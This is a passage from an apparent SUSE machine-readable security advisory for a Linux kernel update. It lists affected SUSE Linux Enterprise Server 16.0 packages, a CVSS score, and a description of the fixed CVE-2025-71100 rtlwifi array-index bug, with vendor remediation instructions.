"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71099"
},
{
"cve": "CVE-2025-71100",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71100"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()\n\nTID getting from ieee80211_get_tid() might be out of range of array size\nof sta_entry-\u003etids[], so check TID is less than MAX_TID_COUNT. Othwerwise,\nUBSAN warn:\n\n UBSAN: array-index-out-of-bounds in drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c:514:30\n index 10 is out of range for type \u0027rtl_tid_data [9]\u0027",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71100",
"url": "https://www.suse.com/security/cve/CVE-2025-71100"
},
{
"category": "external",
"summary": "SUSE Bug 1256593 for CVE-2025-71100",
"url": "https://bugzilla.suse.com/1256593"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
